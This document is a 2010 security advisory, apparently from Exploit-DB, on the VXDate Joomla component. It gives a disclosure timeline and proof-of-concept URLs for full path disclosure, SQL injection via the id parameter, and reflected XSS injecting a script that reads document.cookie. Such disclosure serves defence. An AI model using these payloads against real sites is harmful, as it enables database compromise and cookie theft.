Joomla! Component com_vxdate - Multiple Vulnerabilities

EDB-ID:

11790

CVE:

N/A

Author:

MustLive

Type:

webapps

Platform:

PHP

Published:

2010-03-17

-------------------------------------------------------------------------------------------------------------

I want to warn you about vulnerabilities in component VXDate for Joomla.


-----------------------------

Advisory: Vulnerabilities in VXDate for Joomla

-----------------------------

URL: http://websecurity.com.ua/3849/

-----------------------------

Timeline:



10.05.2009 - found the vulnerabilities.

12.01.2010 - announced at my site.

18.01.2010 - informed developers.

13.03.2010 - disclosed at my site.

-----------------------------

Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.


Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’



SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5


XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.